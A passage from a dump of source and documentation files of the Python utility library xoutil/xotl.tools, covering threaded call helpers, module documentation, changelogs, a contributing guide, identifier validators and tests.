thread.start()\n return event\n\n\nclass _SyncronizedCaller:\n \"\"\"Protected to be used in `sync_call`:func:\"\"\"\n\n def __init__(self, pooling=0.005):\n self.lock = RLock()\n self._not_bailed = True\n self.pooling = pooling\n\n def __call__(self, funcs, callback, timeout=None):\n def _syncronized_callback(result):\n with self.lock:\n if self._not_bailed:\n callback(result)\n\n events, threads = [], []\n for which in funcs:\n event, thread = async_call(which, callback=_syncronized_callback)\n events.append(event)\n threads.append(thread)\n if timeout:\n\n def set_all_events():\n with self.lock:\n self._not_bailed = False\n for e in events:\n e.set()\n\n timer = Timer(timeout, set_all_events)\n timer.start()\n while events:\n terminated = []\n for event in events:\n flag = event.wait(self.pooling)\n if flag:\n terminated.append(event)\n for e in terminated:\n events.remove(e)\n if timeout:\n timer.cancel()\n\n\ndef sync_call(funcs, callback, timeout=None):\n \"\"\"Calls several functions, each one in it's own thread.\n\n Waits for all to end.\n\n Each time a function ends the `callback` is called (wrapped in a lock to\n avoid race conditions) with the result of the as a single positional\n argument.\n\n If `timeout` is not None it sould be a float number indicading the seconds\n to wait before aborting. Functions that terminated before the timeout will\n have called `callback`, but those that are still working will be ignored.\n\n .. 
todo:: Abort the execution of a thread.\n\n :param funcs: A sequences of callables that receive no arguments.\n\n \"\"\"\n sync_caller = _SyncronizedCaller()\n sync_caller(funcs, callback, timeout)\n\n\nfrom threading import __all__ # noqa\n\n__all__ = list(__all__) + [\"async_call\", \"sync_call\"]\n" }, { "alpha_fraction": 0.7291750311851501, "alphanum_fraction": 0.7315895557403564, "avg_line_length": 45.01852035522461, "blob_id": "44788b0154e74b9192232c2bc0e37adfb353c230", "content_id": "bf12dc713f87a9f28850d40de9a9e307e36c9501", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2485, "license_type": "permissive", "max_line_length": 101, "num_lines": 54, "path": "/docs/source/xotl.tools/future/functools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.functools`:mod: - Higher-order functions and callable objects\n================================================================================\n\n.. module:: xotl.tools.future.functools\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: power(*funcs, times)\n\n.. autoclass:: lwraps(f, n, *, name=None, doc=None, wrapped=None)\n\n.. autofunction:: curry\n\nWe have backported several Python 3.3 features but maybe not all.\n\n.. function:: update_wrapper(wrapper, wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES)\n\n Update a wrapper function to look like the wrapped function. 
The optional\n arguments are tuples to specify which attributes of the original function\n are assigned directly to the matching attributes on the wrapper function\n and which attributes of the wrapper function are updated with the\n corresponding attributes from the original function. The default values\n for these arguments are the module level constants `WRAPPER_ASSIGNMENTS`\n (which assigns to the wrapper function's `__name__`, `__module__`,\n `__annotations__` and `__doc__`, the documentation string) and\n `WRAPPER_UPDATES` (which updates the wrapper function's `__dict__`, i.e.\n the instance dictionary).\n\n To allow access to the original function for introspection and other\n purposes (e.g. bypassing a caching decorator such as `lru_cache`:func:),\n this function automatically adds a `__wrapped__` attribute to the wrapper\n that refers to the original function.\n\n The main intended use for this function is in decorator functions which\n wrap the decorated function and return the wrapper. If the wrapper\n function is not updated, the metadata of the returned function will reflect\n the wrapper definition rather than the original function definition, which\n is typically less than helpful.\n\n `update_wrapper`:func: may be used with callables other than functions.\n Any attributes named in assigned or updated that are missing from the\n object being wrapped are ignored (i.e. this function will not attempt to\n set them on the wrapper function). 
AttributeError is still raised if the\n wrapper function itself is missing any attributes named in updated.\n..\n Local Variables:\n ispell-dictionary: \"en\"\n End:\n" }, { "alpha_fraction": 0.6062406897544861, "alphanum_fraction": 0.6270430684089661, "avg_line_length": 24.884614944458008, "blob_id": "3c965b05dc934dfcacc35e2c08291fddef5b9a4c", "content_id": "82c147c4eedc1e172475d236f7902f6c8d121960", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/xotl/tools/values/ids.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Utilities to obtain identifiers that are unique at different contexts.\n\nContexts could be global, host local or application local. All standard\n`uuid`:mod: tools are included in this one: `UUID`:class:, `uuid1`:func:,\n`uuid3`:func:, `uuid4`:func:, `uuid5`:func:, `getnode`:func: and standard\nUUIDs constants `NAMESPACE_DNS`, `NAMESPACE_URL`, `NAMESPACE_OID` and\n`NAMESPACE_X500`.\n\nThis module also contains:\n\n- `str_uuid`:func:\\ : Return a string with a GUID representation, random if\n the argument is True, or a host ID if not.\n\n.. versionadded:: 1.7.0\n\n.. deprecated:: 2.1.0\n\n\"\"\"\n\nfrom uuid import (\n UUID,\n uuid1,\n uuid3,\n uuid4,\n uuid5,\n getnode, # noqa\n NAMESPACE_DNS,\n NAMESPACE_URL,\n NAMESPACE_OID,\n NAMESPACE_X500,\n)\n\n\ndef str_uuid(random=False): # pragma: no cover\n \"\"\"Return a \"Global Unique ID\" as a string.\n\n :param random: If True, a random uuid is generated (does not use host id).\n\n .. 
deprecated:: 2.1.0 Use `uuid.uuid4`:func: or `uuid.uuid1`:func:.\n\n \"\"\"\n fn = uuid4 if random else uuid1\n return str(fn())\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7497013211250305, "avg_line_length": 40.849998474121094, "blob_id": "684eb409e4cc803b2e0ce393625e37387e50b322", "content_id": "68f80c384954ba45f11231578e3cb6f867eeca3d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1674, "license_type": "permissive", "max_line_length": 79, "num_lines": 40, "path": "/docs/source/history/changes-1.2.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This is the first of the 1.2.0 series. It's been given a bump in the minor\nversion number because we've removed some deprecated functions and/or modules.\n\n- Several enhancements to `xoutil.string`:mod: to make it work on Python 2.7\n and Python 3.2.\n\n Deprecates `xoutil.string.normalize_to_str`:func: in favor of the newly\n created `xoutil.string.force_str`:func: which is Python 3 friendly.\n\n- Backwards incompatible changes in `xoutil.objects`:mod: API. For instance,\n replaces `getattr` parameter with `getter` in `xoutil.objects.xdir`:func:\n and co.\n\n- Extracts decorator-making facilities from `xoutil.decorators`:mod: into\n `xoutil.mdeco`:mod:.\n\n .. The decorator-making decorator\n .. `xoutil.mdeco.decorator`:func: returns a signature-keeping decorator.\n\n- Fixes in `!xoutil.aop.extended`:mod:. Added parameters in\n `!xoutil.aop.classical.weave`:func:.\n\n- Introduces `xoutil.iterators.first_n`:func: and deprecates\n `xoutil.iterators.first`:func: and `xoutil.iterators.get_first`:func:.\n\n- Removes the `zope.interface` awareness from `xoutil.context`:mod: since it\n contained a very hard to catch bug. 
Furthermore, this was included to help\n the implementation of `xotl.ql`, and it's no longer used there.\n\n This breaks version control policy since it was not deprecated beforehand,\n but we feel it's needed to avoid spreading this bug.\n\n- Removed long-standing deprecated modules `xoutil.default_dict`:mod:,\n `xoutil.memoize`:mod: and `xoutil.opendict`:mod:.\n\n- Fixes bug in `xoutil.datetime.strfdelta`:func:. It used to show things like\n '1h 62min'.\n\n- Introduces `xoutil.compat.class_type`:data: that holds class types for Python\n 2 or Python 3.\n" }, { "alpha_fraction": 0.6747624278068542, "alphanum_fraction": 0.6842660903930664, "avg_line_length": 39.58571243286133, "blob_id": "393bb54b584ba9b26f2fedf547f579a8b0cbd1ca", "content_id": "9c35334304200f2dd15b5339ab17d3b4701de605", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2841, "license_type": "permissive", "max_line_length": 87, "num_lines": 70, "path": "/docs/source/xotl.tools/future/itertools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.itertools`:mod: - Functions creating iterators for efficient looping\n=======================================================================================\n\n.. automodule:: xotl.tools.future.itertools\n :members: dict_update_new, first_n, first_non_null,\n\t slides, continuously_slides, ungroup\n\n.. function:: merge(*iterables, key=None)\n\n Merge the iterables in order.\n\n Return an iterator that yields all items from `iterables` following the\n order given by `key`. If `key` is not given we compare the items.\n\n If the `iterables` yield their items in increasing order (w.r.t `key`), the\n result is also ordered (like a merge sort).\n\n ``merge()`` returns the *empty* iterator.\n\n .. versionadded:: 1.8.4\n\n .. versionchanged:: 2.1.0 Based on `heapq.merge`:func:. 
In Python\n 3.5+, this is just an alias of it.\n\n .. deprecated:: 2.1.0 Use `heapq.merge`:func: directly. This function will\n be removed when we support for Python 3.4.\n\n.. autofunction:: delete_duplicates(seq[, key=lambda x: x])\n\n.. autofunction:: iter_delete_duplicates(iter[, key=lambda x: x])\n\n.. autofunction:: iter_without_duplicates(iter[, key=lambda x: x])\n\n.. autofunction:: flatten(sequence, is_scalar=xotl.tools.types.is_scalar, depth=None)\n\n.. function:: xotl.tools.iterators.zip([iter1[, iter2[, ...]]])\n\n Return a zip-like object whose `next()` method returns a tuple where the\n i-th element comes from the i-th iterable argument. The `next()` method\n continues until the shortest iterable in the argument sequence is exhausted\n and then it raises StopIteration.\n\n .. deprecated:: 2.1.0 Use the builtin `zip`:func:. This function will be\n removed in xotl.tools 3.\n\n\n.. function:: xotl.tools.iterators.map(func, *iterables)\n\n Make an iterator that computes the function using arguments from each of the\n iterables. It stops when the shortest iterable is exhausted instead of\n filling in None for shorter iterables.\n\n .. deprecated:: 2.1.0 Use the builtin `map`:func:. This function will be\n removed in xotl.tools 3.\n\n.. function:: xotl.tools.iterators.zip_longest(*iterables, fillvalue=None)\n\n Make an iterator that aggregates elements from each of the iterables. If the\n iterables are of uneven length, missing values are filled-in with\n fillvalue. Iteration continues until the longest iterable is\n exhausted.\n\n If one of the iterables is potentially infinite, then the\n `zip_longest`:func: function should be wrapped with something that limits\n the number of calls (for example `islice`:func: or `takewhile`:func:). 
If\n not specified, `fillvalue` defaults to None.\n\n This function is actually an alias to `itertools.izip_longest`:func: in\n Python 2.7, and an alias to `itertools.zip_longest`:func: in Python\n 3.3.\n" }, { "alpha_fraction": 0.7187633514404297, "alphanum_fraction": 0.7238805890083313, "avg_line_length": 32.5, "blob_id": "6d19460b1dac298b6b0e650cd282e2960e1117ad", "content_id": "dfcab3d558f21a4b80774f0578d269d365eb3342", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4691, "license_type": "permissive", "max_line_length": 90, "num_lines": 140, "path": "/docs/source/CONTRIBUTING.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=====================================\n How to contribute to ``xotl.tools``\n=====================================\n\nTesting\n=======\n\nRunning tests\n-------------\n\nQuick::\n\n pipenv install --dev\n tox\n\n\nWriting tests\n-------------\n\nTesting was not introduced in ``xotl.tools`` until late in the project life.\nSo there are many modules that lack a proper test suite.\n\nTo ease the task of writing tests, we chose `pytest`.\n\nWe use both normal tests (\"à la pytest\") and doctest. The purpose of doctests\nis testing the documentation instead of testing the code, which is the purpose\nof the former.\n\nMost of our normal tests are currently simple functions with the \"test\" prefix\nand are located in the ``tests/`` directory.\n\nMany functions that lacks are, though, tested by our use in other projects.\nHowever, it won't hurt if we write them.\n\n\nDocumentation\n=============\n\nSince ``xotl.tools`` is collection of very disparate stuff, the documentation\nis hardly narrative but is contained in the docstrings of every \"exported\"\nelement, except perhaps for module-level documentation in some cases. 
In\nthese later cases, a more narrative text is placed in the ``.rst`` file that\ndocuments the module.\n\n\nVersioning and deprecation\n==========================\n\n`xoutil` uses three version components.\n\nThe first number refers to language compatibility: `xoutil` 1.x series are\ndevoted to keeping compatible versions of the code for both Python 2.7 and\nPython 3.2+. The jump to 2.x version series will made when `xoutil` won't\nsupport Python 2.7 any longer.\n\nFrom version 2.1.0, we renamed the package to ``xotl.tools`` but we keep\nimports up to version 3.0, and distribution of ``xoutil`` up to version 2.2.0.\n\nThe second number is library major version indicator. This indicates, that\nsome deprecated stuff are finally removed and/or new functionality is\nprovided.\n\nThe third number is minor release number. Devoted to indicate mostly fixes to\nexisting functionality. Though many times, some functions are merged and the\nold ones get a deprecation warning.\n\nOccasionally, a fourth component is added to a release. This usually means a\npackaging problem, or bug in the documentation.\n\n\nModule layout and rules\n=======================\n\nMany modules in ``xotl.tools`` contains definitions used in ``xotl.tools`` itself. Though\nwe try to logically place every feature into a rightful, logical module;\nsometimes this is not possible because it would lead to import dependency\ncycles.\n\nWe are establishing several rules to keep our module layout and dependency\nquite stable while, at the same time, allowing developers to use almost every\nfeature in xoutil.\n\nWe divide xoutil modules into 4 tiers:\n\n#. Tier 0\n\n This tier groups the modules that **must not** depend from other modules\n besides the standard library. These modules implement some features that\n are exported through other xoutil modules. These module are never\n documented, but their re-exported features are documented elsewhere.\n\n#. 
Tier 1\n\n In this tier we have:\n\n - `xotl.tools.decorator.meta`:mod:. This is to allow the definition of\n decorators in other modules.\n\n - ``xotl.tools.names`:mod:. This is to allow the use of\n `xotl.tools.names.namelist`:class: for the ``__all__`` attribute of other\n modules.\n\n - `xotl.tools.deprecation`:mod:. It **must not** depend on any other\n module. Many modules in ``xotl.tools`` will use this module at import\n time to declare deprecated features.\n\n#. Tier 2\n\n Modules in this tier should depend only on features defined in tiers 0 and 1\n modules, and that export features that could be imported at the module\n level.\n\n This tier only has the `xotl.tools.modules`:mod:. Both\n `xotl.tools.modules.modulepropery`:func: and\n `xotl.tools.modules.modulemethod`:func: are meant be used at module level\n definitions, so they are likely to be imported at module level.\n\n#. Tier 3\n\n The rest of the modules.\n\n In this tier, `xotl.tools.objects`:mod: is king. But in order to allow the\n import of other modules the following pair of rules are placed:\n\n - At the module level only import from upper tiers.\n\n - Imports from tier 3 are allowed, but only inside the functions that use\n them.\n\n This entails that you can't define a function that must be a module level\n import, like a decorator for other functions. For that reason, decorators\n are mostly placed in the `xotl.tools.decorator`:mod: module.\n\n\nThe tiers above are a \"logical suggestion\" of how xoutil modules are organized\nand indicated how they might evolve.\n\n\n.. 
[#py-for-tests] See definitive list of needed Python interpreters in\n ``tox.ini`` file.\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6369102597236633, "avg_line_length": 32.78125, "blob_id": "4cc9474f3d210dcef0455b8dfc63866421b65564", "content_id": "c98e1ed92086e9e21adad7c4366153756206bbee", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2164, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/docs/source/xotl.tools/future/types.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.types`:mod: - Names for built-in types and extensions\n========================================================================\n\n.. module:: xotl.tools.future.types\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added mainly compatibility type definitions, those that each one could be in one\nversion and not in other.\n\n.. autofunction:: new_class\n\n .. versionadded:: 1.5.5\n\n.. autofunction:: prepare_class\n\n .. versionadded:: 1.5.5\n\n.. class:: MappingProxyType\n\n .. versionadded:: 1.5.5\n\n Read-only proxy of a mapping. It provides a dynamic view on the mapping’s\n entries, which means that when the mapping changes, the view reflects these\n changes.\n\n .. note:: In Python 3.3+ this is an alias for\n `types.MappingProxyType`:class: in the standard library.\n\n.. class:: SimpleNamespace\n\n .. versionadded:: 1.5.5\n\n A simple `object`:class: subclass that provides attribute access to its\n namespace, as well as a meaningful repr.\n\n Unlike `object`:class:, with ``SimpleNamespace`` you can add and remove\n attributes. 
If a ``SimpleNamespace`` object is initialized with keyword\n arguments, those are directly added to the underlying namespace.\n\n The type is roughly equivalent to the following code::\n\n class SimpleNamespace(object):\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n def __repr__(self):\n keys = sorted(self.__dict__)\n items = (\"{}={!r}\".format(k, self.__dict__[k]) for k in keys)\n return \"{}({})\".format(type(self).__name__, \", \".join(items))\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n\n ``SimpleNamespace`` may be useful as a replacement for ``class NS: pass``.\n However, for a structured record type use `~collections.namedtuple`:func:\n instead.\n\n .. note:: In Python 3.4+ this is an alias to\n `types.SimpleNamespace`:class:.\n\n.. autoclass:: DynamicClassAttribute\n" }, { "alpha_fraction": 0.6817666888237, "alphanum_fraction": 0.6902604699134827, "avg_line_length": 32.00934600830078, "blob_id": "cf173251b8fbfb328adab7e593101d46eba96e2a", "content_id": "73653fac41b7eca7c17a090246185568579f350c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3532, "license_type": "permissive", "max_line_length": 79, "num_lines": 107, "path": "/docs/source/xotl.tools/future/collections.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "``xotl.tools.future.collections`` - High-performance container datatypes\n========================================================================\n\n.. module:: xotl.tools.future.collections\n\nThis module extends the standard library's `collections`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since this is different in Python 2.7\nand Python 3.3. Notably importing ``abc`` is not available in Python 2.7.\n\nWe have backported several Python 3.3 features but not all.\n\n\n.. 
autoclass:: defaultdict\n\n.. autoclass:: opendict\n :members: from_enum\n\n.. autoclass:: codedict\n\n.. autoclass:: Counter\n\n .. note:: Backported from Python 3.3. In Python 3.3 this is an alias.\n\n.. autoclass:: OrderedDict\n\n .. note:: Backported from Python 3.3. In Python 3.3 this is an alias.\n\n.. autoclass:: OpenDictMixin\n\n.. autoclass:: OrderedSmartDict\n\n.. autoclass:: SmartDictMixin\n\n.. autoclass:: StackedDict\n :members: push_level, pop_level, level, peek\n\n .. method:: pop()\n\n A deprecated alias for `pop_level`:meth:.\n\n .. deprecated:: 1.7.0\n\n .. method:: push(*args, **kwargs)\n\n A deprecated alias for `push_level`:meth:.\n\n .. deprecated:: 1.7.0\n\n\n.. class:: ChainMap(*maps)\n\n A ChainMap groups multiple dicts or other mappings together to create a\n single, updateable view. If no maps are specified, a single empty\n dictionary is provided so that a new chain always has at least one mapping.\n\n The underlying mappings are stored in a list. That list is public and can\n accessed or updated using the maps attribute. There is no other state.\n\n Lookups search the underlying mappings successively until a key is found.\n In contrast, writes, updates, and deletions only operate on the first\n mapping.\n\n A ChainMap incorporates the underlying mappings by reference. So, if one of\n the underlying mappings gets updated, those changes will be reflected in\n ChainMap.\n\n All of the usual dictionary methods are supported. In addition, there is a\n maps attribute, a method for creating new subcontexts, and a property for\n accessing all but the first mapping:\n\n .. attribute:: maps\n\n A user updateable list of mappings. The list is ordered from\n first-searched to last-searched. It is the only stored state and can be\n modified to change which mappings are searched. The list should always\n contain at least one mapping.\n\n .. 
method:: new_child(m=None)\n\n Returns a new `ChainMap`:class: containing a new map followed by all of\n the maps in the current instance. If ``m`` is specified, it becomes the\n new map at the front of the list of mappings; if not specified, an empty\n dict is used, so that a call to ``d.new_child()`` is equivalent to:\n ``ChainMap({}, *d.maps)``. This method is used for creating subcontexts\n that can be updated without altering values in any of the parent\n mappings.\n\n .. versionchanged:: 1.5.5\n\t The optional ``m`` parameter was added.\n\n .. attribute:: parents\n\n Property returning a new ChainMap containing all of the maps in the\n current instance except the first one. This is useful for skipping the\n first map in the search. Use cases are similar to those for the\n nonlocal keyword used in nested scopes. A reference to ``d.parents`` is\n equivalent to: ``ChainMap(*d.maps[1:])``.\n\n\n .. note:: Backported from Python 3.4. In Python 3.4 this is an alias.\n\n\n.. autoclass:: PascalSet\n\n.. 
autoclass:: BitPascalSet\n" }, { "alpha_fraction": 0.6245919466018677, "alphanum_fraction": 0.6251360177993774, "avg_line_length": 23.1842098236084, "blob_id": "eb4a49bcbf743d8837669e52f70398e86f1d72ca", "content_id": "fbd1d94b8f07d56cad6a503ea7435af0a21874cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "no_license", "max_line_length": 73, "num_lines": 76, "path": "/xotl/tools/validators/identifiers.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"\nRegular expressions and validation functions for several identifiers.\n\"\"\"\n\nfrom re import compile as _regex_compile\n\n\n__all__ = (\n \"is_valid_identifier\",\n \"is_valid_full_identifier\",\n \"is_valid_public_identifier\",\n \"is_valid_slug\",\n)\n\n\ndef is_valid_identifier(name):\n \"\"\"Returns True if `name` a valid Python identifier.\n\n If `name` is not a string, return False. This is roughly::\n\n isinstance(name, str) and name.isidentifier()\n\n \"\"\"\n return isinstance(name, str) and name.isidentifier()\n\n\ndef check_identifier(name):\n \"\"\"Checks if `name` a valid Python identifier.\n\n If not, an exception is raised.\n\n \"\"\"\n if is_valid_identifier(name):\n return name\n else:\n raise ValueError('\"%s\" is not a valid identifier!' 
% name)\n\n\ndef is_valid_full_identifier(name):\n \"\"\"Returns True if `name` is a valid dotted Python identifier.\n\n See `is_valid_identifier`:func: for what \"validity\" means.\n\n \"\"\"\n if isinstance(name, str):\n return all(part.isidentifier() for part in name.split(\".\"))\n else:\n return False\n\n\ndef is_valid_public_identifier(name):\n \"\"\"Returns True if `name` is a valid Python identifier that is deemed\n public.\n\n Convention says that any name starting with a \"_\" is not public.\n\n See `is_valid_identifier`:func: for what \"validity\" means.\n\n \"\"\"\n return is_valid_identifier(name) and not name.startswith(\"_\")\n\n\n_SLUG_REGEX = _regex_compile(r\"(?i)^[\\w]+([-][\\w]+)*$\")\n\n\ndef is_valid_slug(slug):\n return isinstance(slug, str) and _SLUG_REGEX.match(slug)\n" }, { "alpha_fraction": 0.6377708911895752, "alphanum_fraction": 0.7492260336875916, "avg_line_length": 45.14285659790039, "blob_id": "bf3e581217597a6ed0728023e7ee21313dba6b48", "content_id": "3b207e8333966194d890b73f43484327acd5142e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 324, "license_type": "permissive", "max_line_length": 101, "num_lines": 7, "path": "/docs/source/history/_changes-1.7.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.bound.until`:func: and `xoutil.bound.until_errors`:func:.\n\n- Fix issue that made `xoutil.uuid`:mod: unusable. 
Introduced in\n version 1.7.1, commit `58eb359\n <https://github.com/merchise-autrement/xoutil/commit/58eb35950cc33a9ecaa6565895e1b2147cace9f9_>`__.\n\n- Remove support for Python 3.1 and Python 3.2.\n" }, { "alpha_fraction": 0.604234516620636, "alphanum_fraction": 0.6091205477714539, "avg_line_length": 25.69565200805664, "blob_id": "0e2ab2b35e754e042650ee73b05faf73f68d3c95", "content_id": "a2d0449bf7ccaf0f0a0dfda15fc02d85fa42cd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3685, "license_type": "no_license", "max_line_length": 72, "num_lines": 138, "path": "/tests/test_modules.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nimport unittest\n\nfrom xoutil.modules import customize, modulemethod\n\n\nclass TestModulesCustomization(unittest.TestCase):\n def setUp(self):\n import testbed\n\n self.testbed = testbed\n\n def tearDown(self):\n sys.modules[self.testbed.__name__] = self.testbed\n\n def test_echo(self):\n import testbed\n\n module, created, klass = customize(testbed)\n self.assertEqual(10, module.echo(10))\n\n def test_module_props(self):\n @property\n def this(mod):\n return mod\n\n import testbed\n\n attrs = {\"this\": this}\n module, created, klass = customize(testbed, custom_attrs=attrs)\n self.assertEqual(module, module.this)\n\n\nclass TestModuleDecorators(unittest.TestCase):\n def test_echo_module_level(self):\n import sys\n\n @modulemethod\n def echo(self, *args):\n return (self, args)\n\n current_module = sys.modules[__name__]\n self.assertEqual((current_module, (1, 2)), echo(1, 2))\n\n def test_moduleproperties(self):\n import customizetestbed as m\n\n 
self.assertIs(m, m.this)\n self.assertIs(None, m.store)\n self.assertIsNone(m.prop)\n m.store = (1, 2)\n m.prop = \"prop\"\n self.assertEqual((1, 2), m.store)\n self.assertEqual((1, 2), m._store)\n self.assertIs(\"prop\", m.prop)\n\n with self.assertRaises(AttributeError):\n m.this = 1\n\n del m.store\n with self.assertRaises(AttributeError):\n m._store == ()\n self.assertIs(None, m.store)\n\n del m.prop\n with self.assertRaises(AttributeError):\n m._prop == \"prop\"\n self.assertIsNone(m.prop)\n\n def test_module_level_memoized_props(self):\n import customizetestbed as m\n from xoutil.future.inspect import getattr_static\n\n self.assertNotEquals(getattr_static(m, \"memoized\"), m)\n self.assertIs(m.memoized, m)\n self.assertIs(getattr_static(m, \"memoized\"), m)\n\n\ndef test_get_module_path_by_module_object():\n import xotl.tools\n import xotl.tools.future.itertools\n from os.path import join\n from xotl.tools.modules import get_module_path\n\n top = xotl.tools.__path__[0]\n expected = top\n assert get_module_path(xotl.tools) == expected\n\n expected = (\n join(top, \"future\", \"itertools.py\"),\n join(top, \"future\", \"itertools.pyc\"),\n join(top, \"future\", \"itertools.pyo\"),\n )\n assert get_module_path(xotl.tools.future.itertools) in expected\n\n\ndef test_get_module_path_by_module_string_abs():\n import xotl.tools\n from os.path import join\n from xotl.tools.modules import get_module_path\n\n top = xotl.tools.__path__[0]\n expected = top\n assert get_module_path(\"xotl.tools\") == expected\n expected = (\n join(top, \"future\", \"itertools.py\"),\n join(top, \"future\", \"itertools.pyc\"),\n join(top, \"future\", \"itertools.pyo\"),\n )\n assert get_module_path(\"xotl.tools.future.itertools\") in expected\n\n\ndef test_get_module_path_by_module_string_rel():\n import pytest\n from xoutil.modules import get_module_path\n\n with pytest.raises(TypeError):\n assert get_module_path(\".iterators\")\n\n\ndef test_object_stability():\n import testbed\n from 
testbed import selfish\n\n a, b = testbed.selfish()\n c, d = selfish()\n e, f = testbed.selfish()\n assert a == c == e\n assert b == d == f\n" }, { "alpha_fraction": 0.554616391658783, "alphanum_fraction": 0.5570546388626099, "avg_line_length": 32.25405502319336, "blob_id": "1e29fdba001922f50278fd6018b0a7e122ece964", "content_id": "3c669eda79be5fb6c5bf2c863cc222993ac4e45b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6157, "license_type": "no_license", "max_line_length": 87, "num_lines": 185, "path": "/xotl/tools/clipping.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Complements for object string representation protocol.\n\nThere are contexts that using ``str`` or ``repr`` protocol would be inadequate\nbecause shorter string representations are expected (e.g. formatting recursive\nobjects in `pprint`:mod: standard module that they have a new Boolean\nparameter in Python 3 named ``compact``).\n\nThere is a protocol to complement operators used by standard string\nrepresentation functions (``__str__``, ``__repr__``) by defining a new one\nwith name ``__crop__``. 
This operator will receive some extra parameters with\ndefault values, see `crop`:func: function for details.\n\n\"\"\"\n\n\n#: Value for `max_width` parameter in functions that shorten strings, must not\n#: be less than this value.\nMIN_WIDTH = 8\n\n#: Default value for `max_width` parameter in functions that shorten strings,\n#: see `crop`:func:.\nDEFAULT_MAX_WIDTH = 64\n\nELLIPSIS_ASCII = \"...\"\nELLIPSIS_UNICODE = \"…\"\n\n#: Value used as a fill when a string representation overflows.\nELLIPSIS = ELLIPSIS_UNICODE\n\n#: Operator name allowing objects to define theirs own method for string\n#: shortening.\nOPERATOR_NAME = \"__crop__\"\n\n_LAMBDA_NAME = (lambda: 0).__name__\n\n\ndef _check_max_width(max_width, caller=None):\n \"\"\"Type constrain for \"max_width\" parameter.\"\"\"\n if max_width is None:\n max_width = DEFAULT_MAX_WIDTH\n elif max_width < MIN_WIDTH:\n msg = \"{}() \".format(caller) if caller else \"\"\n msg += (\n \"invalid value for `max_width`, must be between greated than \" \"{}; got {}\"\n ).format(MIN_WIDTH, max_width)\n raise ValueError(msg)\n return max_width\n\n\ndef crop(obj, max_width=None, canonical=False):\n \"\"\"Return a reduced string representation of `obj`.\n\n Classes can now define a new special attribute ``__crop__``. It\n can be a `string <str>`:class: (or `unicode`:class: in Python 2). Or a\n method::\n\n def __crop__(self, max_width=None, canonical=False):\n pass\n\n If the `obj` does not implement the ``__crop__`` protocol, a standard one\n is computed.\n\n :param max_width: Maximum length for the resulting string. If is not\n given, defaults to `DEFAULT_MAX_WIDTH`:obj:.\n\n :param canonical: If True `repr`:func: protocol must be used instead\n `str`:func: (the default).\n\n .. 
